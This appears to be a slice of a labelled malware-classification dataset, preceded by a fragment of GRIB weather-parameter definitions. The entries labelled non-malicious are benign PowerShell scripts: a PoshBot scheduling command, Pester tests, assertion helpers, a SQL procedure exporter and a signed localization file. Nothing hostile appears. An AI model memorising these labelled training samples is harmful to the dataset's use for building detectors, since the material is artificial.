; } #Time-mean volumetric soil moisture 'm**3 m**-3' = { discipline = 2 ; parameterCategory = 0 ; parameterNumber = 25 ; indicatorOfUnitForTimeRange = 1 ; typeOfStatisticalProcessing = 0 ; lengthOfTimeRange = 24 ; } #Time-integrated water runoff and drainage rate in the last 24h 'kg m**-2' = { discipline = 2 ; parameterCategory = 0 ; parameterNumber = 42 ; indicatorOfUnitForTimeRange = 1 ; typeOfStatisticalProcessing = 1 ; lengthOfTimeRange = 24 ; } #Time-mean water runoff and drainage rate in the last 24h 'kg m**-2 s**-1' = { discipline = 2 ; parameterCategory = 0 ; parameterNumber = 42 ; indicatorOfUnitForTimeRange = 1 ; typeOfStatisticalProcessing = 0 ; lengthOfTimeRange = 24 ; } #Time-mean snow depth water equivalent 'kg m**-2' = { discipline = 0 ; parameterCategory = 1 ; parameterNumber = 60 ; indicatorOfUnitForTimeRange = 1 ; typeOfStatisticalProcessing = 0 ; lengthOfTimeRange = 24 ; } #Time-mean skin temperature 'K' = { discipline = 0 ; parameterCategory = 0 ; parameterNumber = 17 ; indicatorOfUnitForTimeRange = 1 ; typeOfStatisticalProcessing = 0 ; lengthOfTimeRange = 24 ; } #Time-integrated snow melt rate in the last 24h 'kg m**-2' = { discipline = 2 ; parameterCategory = 0 ; parameterNumber = 41 ; indicatorOfUnitForTimeRange = 1 ; typeOfStatisticalProcessing = 1 ; lengthOfTimeRange = 24 ; } #Upward sea water velocity 'm s**-1' = { discipline = 10 ; parameterCategory = 4 ; parameterNumber = 27 ; typeOfFirstFixedSurface = 168 ; typeOfSecondFixedSurface = 168 ; } #Time-mean upward sea water velocity 'm s**-1' = { discipline = 10 ; parameterCategory = 4 ; parameterNumber = 27 ; typeOfFirstFixedSurface = 168 ; typeOfSecondFixedSurface = 168 ; typeOfStatisticalProcessing = 0 ; } #Maximum individual wave height 'm' = { discipline = 10 ; parameterCategory = 0 ; parameterNumber = 24 ; }
combined_dataset/train/non-malicious/3347.ps1
3347.ps1
function New-ScheduledCommand { [PoshBot.BotCommand( Aliases = ('newschedule', 'new-schedule'), Permissions = 'manage-schedules' )] [cmdletbinding(DefaultParameterSetName = 'repeat')] param( [parameter(Mandatory, ParameterSetName = 'repeat')] [parameter(Mandatory, ParameterSetName = 'once')] $Bot, [parameter(Mandatory, Position = 0, ParameterSetName = 'repeat')] [parameter(Mandatory, Position = 0, ParameterSetName = 'once')] [ValidateNotNullOrEmpty()] [string]$Command, [parameter(Mandatory, Position = 1, ParameterSetName = 'repeat')] [ValidateNotNull()] [int]$Value, [parameter(Mandatory, Position = 2, ParameterSetName = 'repeat')] [ValidateSet('days', 'hours', 'minutes', 'seconds')] [ValidateNotNullOrEmpty()] [string]$Interval, [parameter(ParameterSetName = 'repeat')] [parameter(Mandatory, ParameterSetName = 'once')] [ValidateScript({ if ($_ -as [datetime]) { return $true } else { throw '''StartAfter'' must be a datetime.' } })] [string]$StartAfter, [parameter(Mandatory, ParameterSetName = 'once')] [switch]$Once ) if (-not $Command.StartsWith($Bot.Configuration.CommandPrefix)) { $Command = $Command.Insert(0, $Bot.Configuration.CommandPrefix) } $botMsg = [Message]::new() $botMsg.Text = $Command $botMsg.From = $global:PoshBotContext.From $botMsg.To = $global:PoshBotContext.To if ($PSCmdlet.ParameterSetName -eq 'repeat') { if ($PSBoundParameters.ContainsKey('StartAfter')) { $schedMsg = [ScheduledMessage]::new($Interval, $value, $botMsg, [datetime]$StartAfter) } else { $schedMsg = [ScheduledMessage]::new($Interval, $value, $botMsg) } } elseIf ($PSCmdlet.ParameterSetName -eq 'once') { $schedMsg = [ScheduledMessage]::new($botMsg, [datetime]$StartAfter) } try { $Bot.Scheduler.ScheduleMessage($schedMsg) if ($PSCmdlet.ParameterSetName -eq 'repeat') { New-PoshBotCardResponse -Type Normal -Text "Command [$Command] with ID [$($schedMsg.Id)] scheduled at interval [$Value $($Interval.ToLower())]." -ThumbnailUrl $thumb.success } elseIf ($PSCmdlet.ParameterSetName -eq 'once') { New-PoshBotCardResponse -Type Normal -Text "Command [$Command] with ID [$($schedMsg.Id)] scheduled for one time at [$([datetime]$StartAfter)]." -ThumbnailUrl $thumb.success } } catch { New-PoshBotCardResponse -Type Error -Text $_.ToString() -ThumbnailUrl $thumb.error } }
combined_dataset/train/non-malicious/1905.ps1
1905.ps1
Describe "Get-FormatData" -Tags "CI" { Context "Check return type of Get-FormatData" { It "Should return an object[] as the return type" { $result = Get-FormatData ,$result | Should -BeOfType "System.Object[]" } } It "Can get format data requiring '-PowerShellVersion 5.1'" { $format = Get-FormatData System.IO.FileInfo -PowerShellVersion 5.1 $format.TypeNames | Should -HaveCount 2 $format.TypeNames[0] | Should -BeExactly "System.IO.DirectoryInfo" $format.TypeNames[1] | Should -BeExactly "System.IO.FileInfo" $format.FormatViewDefinition | Should -HaveCount 4 } It "Should return nothing for format data requiring '-PowerShellVersion 5.1' and not provided" { Get-FormatData System.IO.FileInfo | Should -BeNullOrEmpty } }
combined_dataset/train/non-malicious/3981.ps1
3981.ps1
function Assert-NotNullOrEmpty { param([string]$value) Assert-False { [string]::IsNullOrEmpty($value) } } function Assert-IsInstance { param([object] $obj, [Type] $type) Assert-AreEqual $obj.GetType() $type } function Assert-PropertiesCount { param([PSCustomObject] $obj, [int] $count) $properties = $obj.PSObject.Properties Assert-AreEqual $([System.Linq.Enumerable]::ToArray($properties).Count) $count }
combined_dataset/train/non-malicious/Script-Proc_1.sql.ps1
Script-Proc_1.sql.ps1
#Copyright (c) 2011 Justin Dearing # #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: # #The above copyright notice and this permission notice shall be included in #all copies or substantial portions of the Software. # #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN #THE SOFTWARE. # The authoritative version is https://github.com/justaprogrammer/PowerShellScripts/blob/master/Script-Proc.ps1. # If you have a change I'd love to know about it to consider merging it into github. param( [string] $ProcedureName, [string] $Path = "$($ProcedureName).sql", [string] $ConnectionString = 'Data Source=.\\sqlexpress;Initial Catalog=master;Integrated Security=SSPI;' ); try { [System.Data.SqlClient.SqlConnection] $cn = New-Object System.Data.SqlClient.SqlConnection (,$ConnectionString); $cn.Open() > $null; $cmd = $cn.CreateCommand(); $cmd.CommandType = [System.Data.CommandType]::StoredProcedure; $cmd.CommandText = 'sp_helptext'; $cmd.Parameters.AddWithValue('@objname', $ProcedureName) > $null; [System.Data.IDataReader] $rdr = $cmd.ExecuteReader(); [string] $sproc_text = ''; while ($rdr.Read()) { $sproc_text += $rdr[0]; } $sproc_text | Out-File -FilePath $Path; } finally { if ($cmd -ne $null) { $cmd.Dispose(); } if ($cn -ne $null) { $cn.Dispose(); } }
combined_dataset/train/non-malicious/sample_17_25.ps1
sample_17_25.ps1
ConvertFrom-StringData @' id_hypervkb2263829check=Checking for KB2263829 id_hypervkb2263829checkdesc=Checking version of Hvax64.exe and other binaries '@ # SIG # Begin signature block # MIIoVAYJKoZIhvcNAQcCoIIoRTCCKEECAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCB4hX6LcStXvDa3 # iIHO9QPYShckV3UzXGbEGBaZ2Que06CCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiUwghohAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIPof # lzYsbn+mM3iT/C8hDRAvzP3BOkl6+0Im9zczy0ZvMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAE0ulysUeb6miwQw8zQlIcfv8joWEKq9BuRx4 # OApBv55t9wjy6uUz38S7uPCrAxNIbloKTC1BLIACcBvo7h80S9KAOkgMvSH6nILQ # GOsh+QoeAkKBy/T4AyAnyD4D4wezmzPEi5i9VJ1QfMefeIdmcfppeaSbD2dtWOpv # QiVgsiO4UXdJTzs1o8NA0dDguUwSoqJDobvZZeVrXMJ/YqDlfBiPVO42t8cHpGes # 497ZAqeqdIx0TEtkeANMcp5lbXFfz72zPb/E7qj8z4V8tO2c0FvwlmWbcl7kat2s # DwnU+h4t0xCSjLcY+3/aH92PuC34xu/HnL3Y14EjIlVldDBYYqGCF68wgherBgor # BgEEAYI3AwMBMYIXmzCCF5cGCSqGSIb3DQEHAqCCF4gwgheEAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCB3/GcW/Vz6s5o/Q3hSUO2UlhVhN/ej3znE # zKCbEgH1MAIGZutC6/R9GBIyMDI0MTAyODExNDA0MC4zNVowBIACAfSggdmkgdYw # gdMxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsT # JE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMe # blNoaWVsZCBUU1MgRVNOOjQwMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIR/jCCBygwggUQoAMCAQICEzMAAAH+0KjC # ezQhCwEAAQAAAf4wDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTAwHhcNMjQwNzI1MTgzMTE4WhcNMjUxMDIyMTgzMTE4WjCB0zELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z # b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046NDAxQS0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQC8 # vCEXFaWoDjeiWwTg8J6BniZJ+wfZhNIoRi/wafffrYGZrJx1/lPe1DGk/c1abrZg # dSJ4hBfD7S7iqVrLgA3ciicj7js2mL1+jnbF0BcxfSkatzR6pbxFY3dt/Nc8q/Ts # 7XyLYeMPIu7LBjIoD0WZZt4+NqF/0zB3xCDKCQ+3AOtVAYvI6TIzdVOIcqqEa70E # IZVF0db2WY8yutSU9aJhX0tUIHlVh34ARS11+oB2qXNXEDncSDFKqGnolt8QqdN1 # x8/pPwyKvQevBNO1XaHbIMG2NdtAhqrJwo5vrfcZ9GSfbXos4MGDfs//HCGh1dPz # VkLZoc3t7EQOaZuJayyMa8UmSWLaDp23TV5KE6IaaFuievSpddwF6o1vpCgXyNf+ # 4NW1j2m8viPxoRZLj2EpQfSbOwK5wivBRL7Hwy5PS5/tVcIU0VuIJQ1FOh/EncHj # nh4YmEvR/BRNFuDIJukuAowoOIJG5vrkOFp4O9QAAlP3cpIKh4UKiSU9q9uBDJqE # ZkMv+9YBWNflvwnOGXL2AYJ0r+qLqL5zFnRLzHoHbKM9tl90FV8f80Gn/UufvFt4 # 4RMA6fs5P0PdQa3Sr4qJaBjjYecuPKGXVsC7kd+CvIA7cMJoh1Xa2O+QlrLao6cX # sOCPxrrQpBP1CB8l/BeevdkqJtgyNpRsI0gOfHPbKQIDAQABo4IBSTCCAUUwHQYD # VR0OBBYEFG/Oe4n1JTaDmX/n9v7kIGJtscXdMB8GA1UdIwQYMBaAFJ+nFV0AXmJd # g/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9z # b2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El # MjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6 # Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGlt # ZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0l # AQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUA # A4ICAQCJPg1S87aXD7R0My2wG7GZfajeVVCqdCS4hMAYgYKAj6yXtmpk5MN3wurG # wfgZYI9PO1ze2vwCAG+xgjNaMXCKgKMJA4OrWgExY3MSwrNyQfEDNijlLN7s4+Qw # DcMDFWrhJJHzL5NELYZw53QlF5nWU+WGU+X1cj7Pw6C04+ZCcsuI/2rOlMfAXN76 # xupKfxx6R24xl0vIcmTc2LDcCeCVT9ZPMaxAB1yH1JVXgseJ9SebBN/SLTuIq1OU # 2SrdvHWLJaDs3uMZkAFFZPaZf5gBUeUrbu32f5a1hufpw4k1fouwfzE9UFFgAhFW # RawzIQB2g/12p9pnPBcaaO5VD3fU2HMeOMb4R/DXXwNeOTdWrepQjWt7fjMwxNHN # lkTDzYW6kXe+Jc1HcNU6VL0kfjHl6Z8g1rW65JpzoXgJ4kIPUZqR9LsPlrI2xpnZ # 76wFSHrYpVOWESxBEdlHAJPFuLHVjiInD48M0tzQd/X2pfZeJfS7ZIz0JZNOOzP1 # K8KMgpLEJkUI2//OkoiWwfHuFA1AdIxsqHT/DCfzq6IgAsSNrNSzMTT5fqtw5sN9 # TiH87/S+ZsXcExH7jmsBkwARMmxEM/EckKj/lcaFZ2D8ugnldYGs4Mvjhg2s3sVG # ccQACvTqx+Wpnx55XcW4Mp0/mHX1ZScZbA7Uf9mNTM6hUaJXeDCCB3EwggVZoAMC # AQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNV # BAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4w # HAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29m # dCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIy # NVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9 # DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2 # Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N # 7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXc # ag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJ # j361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjk # lqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37Zy # L9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M # 269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLX # pyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLU # HMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode # 2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEA # ATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYE # FJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEB # MEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # RG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEE # AYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB # /zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEug # SaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9N # aWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsG # AQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jv # b0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt # 4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsP # MeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++ # Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9 # QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2 # wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aR # AfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5z # bcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nx # t67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3 # Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+AN # uOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/Z # cGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNZMIICQQIBATCCAQGhgdmkgdYw # gdMxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # 